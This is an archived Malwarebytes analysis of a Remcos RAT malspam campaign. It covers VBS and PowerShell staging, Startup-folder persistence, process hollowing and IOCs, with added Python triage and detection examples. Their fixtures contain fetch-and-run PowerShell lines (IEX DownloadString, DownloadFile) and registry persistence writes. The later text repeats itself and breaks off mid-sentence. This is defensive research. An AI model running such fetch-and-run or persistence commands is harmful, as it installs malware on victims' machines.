{
	"id": "d4dba792-2bf1-498c-ae5a-59a6d7657b35",
	"created_at": "2026-04-06T00:15:29.801602Z",
	"updated_at": "2026-04-10T13:11:52.978534Z",
	"deleted_at": null,
	"sha1_hash": "afdb6d26545806385fb8b0974ed373f474fcb366",
	"title": "Remcos RAT delivered via Visual Basic",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 861216,
	"plain_text": "Remcos RAT delivered via Visual Basic\r\nPublished: 2021-07-18 · Archived: 2026-04-05 18:48:31 UTC\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nThis blog post was authored by Erika Noerenberg\r\nIntroduction\r\nOver the past months, Malwarebytes researchers have been tracking a unique malspam campaign delivering the Remcos remote access trojan (RAT) via financially-themed emails. Remcos is often delivered via malicious documents or archive files containing scripts or executables. Like other RATs, Remcos gives the threat actor full control over the infected system and allows them to capture keystrokes, screenshots, credentials, or other sensitive system information. Unlike most RATs used by malicious actors, however, Remcos is marketed as an administrative tool by the company Breaking Security, which sells it openly on its website.\r\nDistribution\r\nRemcos often infects a system by embedding a specially-crafted settings file into an Office document, allowing an attacker to trick a user into running malicious code without additional notification. This variant of Remcos has been observed being distributed via targeted spam emails with an attached archive file. 
The emails and attachment names have been primarily financially-themed; an example email is shown below:\r\nFor illustration, the following table lists a sample of email subjects and attachment names from 2021 by date:\r\nDate | Subject | Attachment Name | Contents\r\n21 Jan | Separate Remittance Advice: paper document no – 9604163 | Payment Advice.img | Payment Advice.vbs\r\n26 Apr | Appraisal Report for your Loan Application-11003354677341 | Appraisal.reportl1100335467734.zip | Appraisal.vbs, Property.hta*\r\n18 May | Fwd: Appraisal Report for your Loan Application-1100788392210 | Appraisalreportl1100788392210.zip | Appraisal..vbs\r\n28 Jun | Fwd: Reminder: Your July Appointment-11002214991 | transaction_completed11003456773311..zip | Report-Slip.vbs\r\n6 Jul | Fwd: Reminder: Your July Appointment-11003456773312 | transaction_completed11003456773312.zip | Report-11003456773312.vbs\r\nIn most Remcos spam campaigns, the payload is an executable contained in an attached archive (.zip) or disk image (.img) file, though malicious documents are also sometimes used. 
In this campaign, however, the emails contain a zip archive containing a Visual Basic script (.vbs) which downloads and executes additional scripts and finally installs the Remcos payload.\r\n*Earlier versions also included a “Property.hta” file which comprised only the VB script wrapped in HTML, as seen below. Interestingly, the body of this HTML consisted only of the text “demo”, which suggests it may have been test code.\r\nAnalysis\r\nRemcos is a fully-functioning RAT that gives the threat actor full control over the infected system and allows them to collect keystrokes, audio, video, screenshots, and system information. Because it has full control, Remcos is also able to download and execute additional software on the system. This Remcos distribution uses a series of scripts that ultimately result in the injection of a Remcos payload into the Windows system binary aspnet_compiler.exe. A sample infection chain for this variant is shown below:\r\nThe samples analyzed below originate from the attachment Appraisalreportl1100788392210.zip (SHA256 4e712de8a3d602ccf55321a85701114c01f9731af356da05fb6e3881a13bb23e). As with all analyzed samples, the infection chain followed the process flow above: the initial Visual Basic script initiates a series of downloads and executions of obfuscated scripts that eventually result in the injection of the final Remcos payload into aspnet_compiler.exe.\r\nAlthough the script above is lengthy due to obfuscation, it ultimately amounts to the following simple PowerShell command, which downloads and executes a second Visual Basic script:\r\nThe first downloaded script (ALL.TXT) also uses simple obfuscation techniques to perform a few simple tasks. 
The $JUANADEARCO variable in this script contains Base64-encoded data which is decoded by the last line of the script (this data is shown decoded in the highlighted box in the image below). This script performs the following actions:\r\nCreates the directory C:\\Users\\Public\\Run\r\nDownloads Run_02_02_02.TXT (saved as C:\\Users\\Public\\Run\\Run.vbs)\r\nDownloads Lerveri.txt (saved as C:\\Users\\Public\\Run\\-----Run+++++++++.ps1)\r\nSets HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Startup to “C:\\Users\\Public\\Run”\r\nSets HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Startup to “C:\\Users\\Public\\Run”\r\nThe Shell Folders registry entries are legacy keys that still exist for backwards compatibility. Setting the “Startup” value of these entries to the malware's working directory makes Explorer treat that directory as the user's Startup folder, so everything in it is executed at the next logon, ensuring persistence. Because the path points at C:\\Users\\Public rather than into the user's profile, comparing the Startup value against its default (%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup) is a cheap way to spot this technique.\r\nRun.vbs is obfuscated in a similar fashion to the initial Visual Basic script:\r\nThis script (deobfuscated below) is responsible only for executing the main PowerShell script, which contains embedded binaries encoded as hex in plaintext.\r\nOne of the binaries encoded in -----Run+++++++++.ps1 is the Remcos payload, which is loaded into the legitimate Windows binary aspnet_compiler.exe. The following function in the PowerShell script loads the Remcos PE into the binary:\r\nAlthough all of the analyzed Remcos samples of this campaign since January 2021 call back to the same IP address and port, no actual C2 traffic has been observed. 
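\r\nThe staging just described (a Base64 blob that the last line of ALL.TXT decodes and runs, a hex-encoded PE inside the final .ps1, two downloads and the Shell Folders rewrite) can be triaged without executing anything. The Python below is an added example written for this page, not code from the Malwarebytes post or from the campaign's scripts: the stage text it scans is constructed to mimic the structure described above, the archive.org paths, the Run.ps1 name and the Invoke-Hollow name are placeholders, and the PE it carves is a header-only skeleton. It decodes Base64 literals, carves hex runs that parse as MZ/PE images, and reports download URLs and any Startup shell-folder value that does not point at the default per-user Startup folder.\r\n

```python
"""Static triage of staged loader scripts such as ALL.TXT, Run.vbs and the final .ps1.

Added example for this page, not code from the Malwarebytes post. The stage text
below is constructed to mirror the structure the post describes; the archive.org
paths, the Run.ps1 / Invoke-Hollow names and the header-only PE are placeholders.
"""
import base64
import binascii
import re
import struct

B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
HEX_RE = re.compile(r"(?:[0-9A-Fa-f]{2}){64,}")                  # >= 64 bytes of hex
URL_RE = re.compile(r"https?://[^\s'\"()\[\]]+")
WINPATH_RE = re.compile(r"(?<![A-Za-z])[A-Za-z]:\\[^'\"\r\n]+")  # skips HKCU:\ prefixes
DEFAULT_STARTUP_SUFFIX = "\\start menu\\programs\\startup"


def decode_base64_blobs(text: str) -> list[str]:
    """Decode long Base64 literals that yield readable text (UTF-8 or UTF-16LE).

    All-hex candidates are left to carve_hex_pe(): hex digits are a subset of the
    Base64 alphabet, so a hex-encoded PE would otherwise decode to junk here.
    """
    layers = []
    for m in B64_RE.finditer(text):
        cand = m.group(0)
        if HEX_RE.fullmatch(cand):
            continue
        try:
            raw = base64.b64decode(cand, validate=True)
        except (binascii.Error, ValueError):
            continue
        for enc in ("utf-8", "utf-16-le"):
            try:
                s = raw.decode(enc)
            except UnicodeDecodeError:
                continue
            if all(ch.isprintable() or ch in "\r\n\t" for ch in s):
                layers.append(s)
                break
    return layers


def carve_hex_pe(text: str) -> list[dict]:
    """Hex runs that decode to a PE image: 'MZ' at offset 0 and e_lfanew -> 'PE\\0\\0'."""
    found = []
    for m in HEX_RE.finditer(text):
        blob = binascii.unhexlify(m.group(0))
        if blob[:2] != b"MZ" or len(blob) < 0x40:
            continue
        (e_lfanew,) = struct.unpack_from("<I", blob, 0x3C)
        if e_lfanew + 24 > len(blob) or blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
            continue
        machine, nsections = struct.unpack_from("<HH", blob, e_lfanew + 4)
        found.append({"offset": m.start(), "size": len(blob), "machine": machine,
                      "sections": nsections, "image": blob})
    return found


def find_startup_redirects(text: str) -> set[str]:
    """Paths written to Explorer's (User) Shell Folders\\Startup value that are not
    the default per-user Startup folder."""
    hits = set()
    for line in text.splitlines():
        if "Shell Folders" in line and "Startup" in line:
            for p in WINPATH_RE.findall(line):
                p = p.rstrip("\\")
                if not p.lower().endswith(DEFAULT_STARTUP_SUFFIX):
                    hits.add(p)
    return hits


def triage_stage(text: str) -> dict:
    """Run every check over a stage and over whatever it Base64-decodes."""
    layers = [text] + decode_base64_blobs(text)
    combined = "\n".join(layers)
    return {
        "layers": len(layers),
        "urls": sorted(set(URL_RE.findall(combined))),
        "startup_redirects": find_startup_redirects(combined),
        "pe_payloads": [{k: v for k, v in pe.items() if k != "image"}
                        for pe in carve_hex_pe(combined)],
    }


# Constructed samples: structure taken from the post, contents made up.
INNER_STAGE = "\n".join([
    "New-Item -ItemType Directory -Force -Path 'C:\\Users\\Public\\Run'",
    "(New-Object Net.WebClient).DownloadFile('https://ia601401.us.archive.org/example/Run_02_02_02.TXT','C:\\Users\\Public\\Run\\Run.vbs')",
    "(New-Object Net.WebClient).DownloadFile('https://ia601401.us.archive.org/example/Lerveri.txt','C:\\Users\\Public\\Run\\Run.ps1')",
    "Set-ItemProperty 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders' -Name Startup -Value 'C:\\Users\\Public\\Run'",
    "Set-ItemProperty 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders' -Name Startup -Value 'C:\\Users\\Public\\Run'",
])
STAGE_ALL_TXT = ("$JUANADEARCO = '" + base64.b64encode(INNER_STAGE.encode()).decode() + "'\n"
                 "IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($JUANADEARCO)))\n")


def _fake_pe_image() -> bytes:
    """256-byte MZ/PE header skeleton (not runnable) standing in for the payload."""
    img = bytearray(0x100)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x80)        # e_lfanew
    img[0x80:0x84] = b"PE\0\0"
    struct.pack_into("<HH", img, 0x84, 0x14C, 3)   # Machine = i386, NumberOfSections = 3
    return bytes(img)


STAGE_FINAL_PS1 = ("$cfg = '" + "AB" * 80 + "'\n"                  # hex, but not a PE
                   "$Remcos = '" + _fake_pe_image().hex().upper() + "'\n"
                   "$bytes = [byte[]] -split ($Remcos -replace '..', '0x$& ')\n"
                   "Invoke-Hollow 'C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_compiler.exe' $bytes\n")
```

\r\nOn a real stage, pass the file's text to triage_stage(). Loaders usually wrap the hex in -split or -replace idioms, which do not matter here because only the hex run itself is examined; the Base64 scan deliberately skips all-hex literals so that a hex-encoded PE is not misread as Base64.\r\n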
All of the script downloads have pointed to addresses on the legitimate website us.archive.org, and the payloads have connected (though only via TCP handshake) to the IP address 185.19.85[.]168 on port 8888.\r\nBecause this IP address has not changed over several months, we investigated passive DNS records to see whether the infrastructure may have been used in other recent attacks. We found that this IP address had the following resolutions over the last few months:\r\nAddress | First Seen | Last Seen\r\nshugardaddy.ddns.net | 26 May 21 |\r\nch-pool-1194.nvpn.to | 24 May 21 | 30 June 21\r\ntippet.duckdns.org | 13 May 21 | 16 May 21\r\nmail.swissauto.top | 29 May 20 | 11 May 21\r\nrandyphoenix.hopto.org | 4 April 21 | 14 April 21\r\nExamination of this IP address revealed several hosted services on multiple ports. The mail.swissauto.top resolution (29 May 20 to 11 May 21, highlighted in the original table) is interesting, as the host appears to be a mail server, and Spamhaus ZEN lists this address as blocked for spam. Furthermore, analysis also revealed that the #totalhash malware database contains malware associated with this address going back as far as 2013. 
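\r\nThe behaviours above give a handful of host-level detection points: a script host (wscript.exe) launching powershell.exe that pulls a .TXT stage from us.archive.org, the Explorer Shell Folders Startup value being pointed somewhere other than the profile's Startup folder, and aspnet_compiler.exe, a .NET precompiler with no reason to open sockets, connecting out to 185.19.85[.]168:8888. The Python below is an added example for this page, not Malwarebytes detection logic: it runs those rules over a few constructed, Sysmon-shaped events (EventID 1 process creation, 13 registry value set, 3 network connection; the SIDs, paths and benign rows are made up, and the assumption that aspnet_compiler.exe never initiates outbound connections is a heuristic, not a documented guarantee). Treating archive.org as a staging host is a hunting signal to pair with the other rules rather than a block rule, since the site itself is legitimate.\r\n

```python
"""Host-side detections for the VBS -> PowerShell -> aspnet_compiler.exe chain.

Added example for this page, not Malwarebytes detection content. EVENTS is a
constructed list of Sysmon-shaped records: field names follow Sysmon (EventID
1 / 3 / 13) but the SIDs, paths and benign rows are made up.
"""
import ipaddress
import re
from dataclasses import dataclass

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# Default per-user Startup folder, whether written expanded or with %USERPROFILE%.
DEFAULT_STARTUP_RE = re.compile(r"\\start menu\\programs\\startup\\?$", re.I)
STARTUP_VALUE_RE = re.compile(r"\\explorer\\(?:user )?shell folders\\startup$", re.I)
# The campaign staged scripts on us.archive.org; the site is legitimate, so this
# is a hunting signal to pair with the other rules, not a block-list entry.
STAGING_URL_RE = re.compile(r"https?://(?:[a-z0-9-]+\.)*us\.archive\.org/[^\s'\"]*", re.I)
KNOWN_C2 = {("185.19.85.168", 8888)}          # IP:port from the post's IOCs
# Process the post shows being hollowed. Heuristic assumption: a .NET
# precompiler should never initiate outbound connections.
HOLLOW_TARGETS = {"aspnet_compiler.exe"}


@dataclass(frozen=True)
class Alert:
    rule: str
    event: int       # index of the event that fired the rule
    detail: str


def _image_name(path: str) -> str:
    """Basename of a Windows image path, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: list[dict]) -> list[Alert]:
    """Apply the five rules to a list of Sysmon-shaped event dicts."""
    alerts: list[Alert] = []
    for i, ev in enumerate(events):
        eid = ev.get("EventID")
        if eid == 1:                                   # process creation
            parent = _image_name(ev.get("ParentImage", ""))
            image = _image_name(ev.get("Image", ""))
            cmd = ev.get("CommandLine", "")
            if parent in SCRIPT_HOSTS and image == "powershell.exe":
                alerts.append(Alert("R1-script-host-spawns-powershell", i, f"{parent} -> {image}"))
            m = STAGING_URL_RE.search(cmd)
            if m:
                alerts.append(Alert("R2-archive-org-staging", i, m.group(0)))
        elif eid == 13:                                # registry value set
            target = ev.get("TargetObject", "")
            details = ev.get("Details", "")
            if STARTUP_VALUE_RE.search(target) and not DEFAULT_STARTUP_RE.search(details):
                alerts.append(Alert("R3-startup-shell-folder-redirect", i, details))
        elif eid == 3:                                 # network connection
            image = _image_name(ev.get("Image", ""))
            ip = ev.get("DestinationIp")
            port = int(ev.get("DestinationPort", 0))
            if ip is None:
                continue
            if (ip, port) in KNOWN_C2:
                alerts.append(Alert("R4-known-remcos-c2", i, f"{ip}:{port}"))
            if image in HOLLOW_TARGETS and ipaddress.ip_address(ip).is_global:
                alerts.append(Alert("R5-hollow-target-egress", i, f"{image} -> {ip}:{port}"))
    return alerts


EVENTS = [  # constructed, not real telemetry
    {"EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": "powershell -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('https://ia601401.us.archive.org/example/ALL.TXT')\""},
    {"EventID": 13,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": r"HKU\S-1-5-21-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Startup",
     "Details": r"C:\Users\Public\Run"},
    {"EventID": 13,                                  # benign: Explorer writing the default
     "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKU\S-1-5-21-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Startup",
     "Details": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"},
    {"EventID": 3,
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe",
     "DestinationIp": "185.19.85.168", "DestinationPort": 8888},
    {"EventID": 3,                                   # benign browser traffic
     "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "DestinationIp": "93.184.216.34", "DestinationPort": 443},
]

if __name__ == "__main__":
    for a in detect(EVENTS):
        print(f"[{a.rule}] event #{a.event}: {a.detail}")
```

\r\nR3 is the one worth keeping on permanently: the Startup value is rewritten only by installers and by Explorer itself, and both write a path ending in Start Menu\\Programs\\Startup, so anything else (here C:\\Users\\Public\\Run) is a strong signal on its own. R4 is a plain IOC match and ages with the infrastructure; R1, R2 and R5 are behavioural and survive a change of C2.\r\n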
Correlating additional malware associated with this address showed several other Remcos samples connecting to the same IP (many to shugardaddy.ddns.net on port 5946); a few recent samples are shown below:\r\nSHA256 Hash | Date Last Seen\r\n15cf9daf5bad1a5a78783f675eb63850e216a690e0f3302738ce3bd825ba6fc1 | 6 Jul 21\r\n0ea2e136c0604fe2336a37c9d7b5a6150abd58e48311fa625ea375468189931e | 5 Jul 21\r\n8d0dfc2239405eebc7a9d5483492a0225963fae4c110ecbd12f1f39ce1ef937a | 29 Jun 21\r\n22634cbaf1a60ca499a9b692aae881cffdaf205a4755ee34915e5512ea87cab4 | 25 Jun 21\r\n898020967dbec06a60b63269d54b15ad968e2f1146f10fdbf22e79e2339425d2 | 25 Jun 21\r\nd7aede3e0703ce5ec7bb4c333d4ddb6551fb5032825e756b7132367625107a36 | 21 Jun 21\r\nOne identifying factor of this campaign is the use of us.archive.org to host payloads. Although this is not unique among malware campaigns in general, it is unique to the Remcos campaigns we have analyzed: only the VBS method of distribution has been observed to display this behavior.\r\nIn an analysis from Morphisec in March of this year, an HCrypt loader sample was analyzed that demonstrated an infection chain similar to that of the Remcos samples discussed above. Although the stages and scripts are not identical, the intermediary steps share a few similarities, such as the file names of the downloaded scripts ALL.txt, Server.txt and, in newer samples, Bypass.txt. The scripts also have a few function names in common, but the HCrypt samples have anti-analysis and anti-virus evasion functionality not seen in the Remcos samples. Further research is required to determine whether this set of scripts is a generically available package or is specific to a particular actor and being re-used across campaigns.\r\nAlthough the actor or group behind this campaign is not known, the sporadic nature of the emails distributing this malware suggests that it could be targeted in nature. 
Remcos is a mature trojan that has evolved over many years; though its basic capabilities have remained the same, the methods of distribution and installation continue to change. Because it is software that can be purchased openly online, it is difficult to trace or attribute its usage to a particular actor. However, given the consistency of network infrastructure and installation methodology, it is possible that the motivation or actors behind these attacks could be identified. Malwarebytes analysts continue to monitor and track this threat and will update detections and indicators as needed.\r\nProtection\r\nMalwarebytes protects users from Remcos by using real-time protection.\r\nReferences\r\nhttps://www.anomali.com/blog/threat-actors-use-msbuild-to-deliver-rats-filelessly\r\nhttps://www.cybereason.com/blog/cybereason-exposes-malware-targeting-us-taxpayers\r\nhttps://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service\r\nIOCs\r\nAnalyzed Samples:\r\nType | Name / Subject | SHA256\r\nEmail | Subject: Fwd: Appraisal Report for your Loan Application-1100788392210 | 673b315a95b8c816502ec0dc3cae79cf14e0d7c09139c2fc4b9202fb0\r\nAttachment | Appraisalreportl1100788392210.zip | 4e712de8a3d602ccf55321a85701114c01f9731af356da05fb6e3881a\r\nExtracted Sample | Appraisal..vbs | 1f8853601030ad92bd78fd3f0fbf39eacd2f39f47317914b67aa26dfd5\r\nRemcos VB Scripts:\r\n92a7e167629bd14c88a03ef1b6719acd143082c495972a829f20cc588fd6e084\r\nb1849476d3b8900288d6bf7c9ac229eba5e64d665398302a0842c335259f6560\r\nba4b51ae64c68b32d126322b51b41dce7c300c01faed97aca35ff142e121a914\r\n5a69f279426b012b64a3099d778cd57aeca9db135d9701c2e11f71d55c3fb5e3\r\ndb01d69a7ae17947f77b50cfb03b2be6b784eeecdabfbb966b61ecdb3490d3ad\r\n109a40435ad446c7b03af30bb049f55275a659c0271fa7a8a1a59d5871d18c10\r\na5ae2e0f9a8f1c50e21ea93f4a195097753cd16436ffa4e946add38da873c8cb
\r\na465bb35f4e7bafb2fea17156c39daee286e49c3f10463ecb8d29766e2d0b200\r\nd2d9b66c9aad0e6cc20a786a89299a8b4a65a5a344db369dfd7bfbad3fb40b55\r\n5f06da67169389577ec237bfb0c3e0e9203833048f48081deed7b6201ad18c27\r\n7519540343e10c7846979809166df1cd0f01087ea53bf20fd5dd416dc6ebad14\r\ndae93e987a854255ff55ce9f62729f17f57d3f8a56933a57cb8de89b698e81f0\r\nb61f6b794f38f736e90ae8aa04e5f71acc8d5470c08ef8841c16087b6710a388\r\n6f4f4f4b980e471c5f8f5d0d95bff5a7ec98e3e2377f18f7fc0d44828cbe33a6\r\nRelated Remcos Samples:\r\n15cf9daf5bad1a5a78783f675eb63850e216a690e0f3302738ce3bd825ba6fc1\r\n0ea2e136c0604fe2336a37c9d7b5a6150abd58e48311fa625ea375468189931e\r\n8d0dfc2239405eebc7a9d5483492a0225963fae4c110ecbd12f1f39ce1ef937a\r\n22634cbaf1a60ca499a9b692aae881cffdaf205a4755ee34915e5512ea87cab4\r\n898020967dbec06a60b63269d54b15ad968e2f1146f10fdbf22e79e2339425d2\r\nd7aede3e0703ce5ec7bb4c333d4ddb6551fb5032825e756b7132367625107a36\r\na80c2e71f7cc69a729035941d13c79fd210290e7f82cefce14ceef7dba3f3026\r\n1aa8163fc4947fec127350aebc420e4832a5e7a3430109201f6796fc12292dfc\r\n4a7d54b6013b6296df3576a8d62f00cbc4af18fbbbfa97b831c38c664b4d70ce\r\nc55dffdcb320a06872faa4cc7777bafd81051a17533e919fbee3fc27e8f47135\r\nadf94da54bc49abc6fdb2a36523eb726f26dacd5598a0fdc64e61b8d500edad8\r\n59aafb3dd9c6cdb95ff662299e1faf3efb01d5ef8479dbbb8032b4b9cb3c3d91\r\n1d969ace725bf5185e64c3c4a6ab122a3ff4eaafe25f56bd8c1d7b7ba2df0aac\r\na54f4ee320b21c1cfde3358a25131476127b9fb1fd5cad9fd03fa2be1f4fd0e2\r\n92a7e167629bd14c88a03ef1b6719acd143082c495972a829f20cc588fd6e084\r\n46b1d3c565a615b2df02a567f507a2dc7f75d088fc2b52b1f1e1ce7a92594175\r\n1a7ceaddf547d47cf7d2d7eda0357d38f489eaeb3b06ea3027ae87df6e5c8195\r\n47287127bcc7bf1502d8b84af3c9050a6b46caa9e1558ab27a2c1b0883505b15\r\n509fb00b3a458a86563737c0ce278f6fb713eafe90da7e14aa0d54566e172a81\r\ne06220108f931b
b43ecf136844cdfede4b9a1bbc637b6ff8a3870710e709fe0e\r\n109a40435ad446c7b03af30bb049f55275a659c0271fa7a8a1a59d5871d18c10\r\n0fe5a7d7d6a2c077b4b641f4d2077f2fa476a2317283323801bed7a7a6770906\r\na465bb35f4e7bafb2fea17156c39daee286e49c3f10463ecb8d29766e2d0b200\r\n0d74a33006727ab086e281681cc8ee3d71ee7843f19b6fa52a86efc92b0444a1\r\n5f06da67169389577ec237bfb0c3e0e9203833048f48081deed7b6201ad18c27\r\n5ca6ae0cf402083bb06f267962b62d812151c8193a6b726ef1b84a2ed7ca5ef2\r\nOther IOCs:\r\n185.19.85.168\r\nia601401.us.archive.org\r\nia601502.us.archive.org\r\nia601405.us.archive.org\r\nia601406.us.archive.org\r\nshugardaddy.ddns.net\r\nch-pool-1194.nvpn.to\r\ntippet.duckdns.org\r\nmail.swissauto.top\r\nrandyphoenix.hopto.org\r\nRemcos VB Scripts:\r\n92a7e167629bd14c88a03ef1b6719acd143082c495972a829f20cc588fd6e084 \r\nb1849476d3b8900288d6bf7c9ac229eba5e64d665398302a0842c335259f6560 \r\nba4b51ae64c68b32d126322b51b41dce7c300c01faed97aca35ff142e121a914 \r\n5a69f279426b012b64a3099d778cd57aeca9db135d9701c2e11f71d55c3fb5e3 \r\ndb01d69a7ae17947f77b50cfb03b2be6b784eeecdabfbb966b61ecdb3490d3ad \r\n109a40435ad446c7b03af30bb049f55275a659c0271fa7a8a1a59d5871d18c10 \r\na5ae2e0f9a8f1c50e21ea93f4a195097753cd16436ffa4e946add38da873c8cb \r\na465bb35f4e7bafb2fea17156c39daee286e49c3f10463ecb8d29766e2d0b200 \r\nd2d9b66c9aad0e6cc20a786a89299a8b4a65a5a344db369dfd7bfbad3fb40b55 \r\n5f06da67169389577ec237bfb0c3e0e9203833048f48081deed7b6201ad18c27 \r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 9 of 42\n\n7519540343e10c7846979809166df1cd0f01087ea53bf20fd5dd416dc6ebad14 \r\ndae93e987a854255ff55ce9f62729f17f57d3f8a56933a57cb8de89b698e81f0 \r\nb61f6b794f38f736e90ae8aa04e5f71acc8d5470c08ef8841c16087b6710a388 \r\n6f4f4f4b980e471c5f8f5d0d95bff5a7ec98e3e2377f18f7fc0d44828cbe33a6 \r\nRelated Remcos 
Samples:\r\n15cf9daf5bad1a5a78783f675eb63850e216a690e0f3302738ce3bd825ba6fc1\r\n0ea2e136c0604fe2336a37c9d7b5a6150abd58e48311fa625ea375468189931e\r\n8d0dfc2239405eebc7a9d5483492a0225963fae4c110ecbd12f1f39ce1ef937a\r\n22634cbaf1a60ca499a9b692aae881cffdaf205a4755ee34915e5512ea87cab4\r\n898020967dbec06a60b63269d54b15ad968e2f1146f10fdbf22e79e2339425d2\r\nd7aede3e0703ce5ec7bb4c333d4ddb6551fb5032825e756b7132367625107a36\r\na80c2e71f7cc69a729035941d13c79fd210290e7f82cefce14ceef7dba3f3026\r\n1aa8163fc4947fec127350aebc420e4832a5e7a3430109201f6796fc12292dfc\r\n4a7d54b6013b6296df3576a8d62f00cbc4af18fbbbfa97b831c38c664b4d70ce\r\nc55dffdcb320a06872faa4cc7777bafd81051a17533e919fbee3fc27e8f47135\r\nadf94da54bc49abc6fdb2a36523eb726f26dacd5598a0fdc64e61b8d500edad8\r\n59aafb3dd9c6cdb95ff662299e1faf3efb01d5ef8479dbbb8032b4b9cb3c3d91\r\nadf94da54bc49abc6fdb2a36523eb726f26dacd5598a0fdc64e61b8d500edad8\r\n1d969ace725bf5185e64c3c4a6ab122a3ff4eaafe25f56bd8c1d7b7ba2df0aac\r\na54f4ee320b21c1cfde3358a25131476127b9fb1fd5cad9fd03fa2be1f4fd0e2\r\n92a7e167629bd14c88a03ef1b6719acd143082c495972a829f20cc588fd6e084\r\n46b1d3c565a615b2df02a567f507a2dc7f75d088fc2b52b1f1e1ce7a92594175\r\n1a7ceaddf547d47cf7d2d7eda0357d38f489eaeb3b06ea3027ae87df6e5c8195\r\n47287127bcc7bf1502d8b84af3c9050a6b46caa9e1558ab27a2c1b0883505b15\r\n509fb00b3a458a86563737c0ce278f6fb713eafe90da7e14aa0d54566e172a81\r\ne06220108f931bb43ecf136844cdfede4b9a1bbc637b6ff8a3870710e709fe0e\r\n109a40435ad446c7b03af30bb049f55275a659c0271fa7a8a1a59d5871d18c10\r\n0fe5a7d7d6a2c077b4b641f4d2077f2fa476a2317283323801bed7a7a6770906\r\na465bb35f4e7bafb2fea17156c39daee286e49c3f10463ecb8d29766e2d0b200\r\n0d74a33006727ab086e281681cc8ee3d71ee7843f19b6fa52a86efc92b0444a1\r\n5f06da67169389577ec237bfb0c3e0e9203833048f48081deed7b6201ad18c27\r\n5ca6ae0cf402083bb06f267962b62d812151c8193a6b726ef1b84a2ed7ca5ef2\r\nOther 
IOCs:\r\n185.19.85.168\r\nia601401.us.archive.org\r\nia601502.us.archive.org\r\nia601405.us.archive.org\r\nia601406.us.archive.org\r\nshugardaddy.ddns.net\r\nch-pool-1194.nvpn.to\r\ntippet.duckdns.org\r\nmail.swissauto.top\r\nrandyphoenix.hopto.org\r\nThis blog post was authored by Erika Noerenberg\r\nIntroduction\r\nOver the past months, Malwarebytes researchers have been tracking a unique malspam campaign delivering the Remcos\r\nremote access trojan (RAT) via financially-themed emails. Remcos is often delivered via malicious documents or archive\r\nfiles containing scripts or executables. Like other RATs, Remcos gives the threat actor full control over the infected system\r\nand allows them to capture keystrokes, screenshots, credentials, or other sensitive system information. Unlike most RATs\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 10 of 42\n\nused by malicious actors however, Remcos is marketed as an administrative tool by the company Breaking Security which\r\nsells it openly on their website.\r\nDistribution\r\nRemcos often infects a system by embedding a specially-crafted settings file into an Office document, allowing an attacker\r\nto trick a user to run malicious code without additional notification. This variant of Remcos has been observed to be\r\ndistributed via targeted spam emails with an attached archive file. 
The emails and attachment names have been primarily\r\nfinancially-themed; an example email is shown below:\r\nFor illustration, the following table lists a sample of email subjects and attachment names from 2021 by date:\r\nDate Subject Attachment Name Contents\r\n21\r\nJan\r\nSeparate\r\nRemittance\r\nAdvice: paper\r\ndocument no –\r\n9604163\r\nPayment Advice.img Payment Advice.vbs\r\n26\r\nApr\r\nAppraisal Report\r\nfor your Loan\r\nApplication-11003354677341\r\nAppraisal.reportl1100335467734.zip\r\nAppraisal.vbs\r\nProperty.hta*\r\n18\r\nMay\r\nFwd: Appraisal\r\nReport for your\r\nLoan\r\nApplication-1100788392210\r\nAppraisalreportl1100788392210.zip Appraisal..vbs\r\n28\r\nJun\r\nFwd: Reminder:\r\nYour July\r\nAppointment-11002214991\r\ntransaction_completed11003456773311..zip Report-Slip.vbs\r\n6 Jul Fwd: Reminder:\r\nYour July\r\ntransaction_completed11003456773312.zip Report-11003456773312.vbs\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 11 of 42\n\nDate Subject Attachment Name Contents\r\nAppointment-11003456773312\r\nIn most Remcos spam campaigns, the payload is an executable contained in an attached archive (.zip) or disk image (.img)\r\nfile, though malicious documents are also sometimes used. In this campaign however, the emails contain a zip archive\r\ncontaining a Visual Basic script (.vbs) which downloads and executes additional scripts and finally installs the Remcos\r\npayload.\r\n*Eariler versions also included a “Property.hta” file which only comprised the VB script wrapped in HTML as seen below.\r\nInterestingly, the body of this HTML consisted only of the text “demo”, which indicates this might have been test code.\r\nAnalysis\r\nRemcos is a fully-functioning RAT that gives the threat actor full control over the infected system and allows them to collect\r\nkeystrokes, audio, video, screenshots, and system information. 
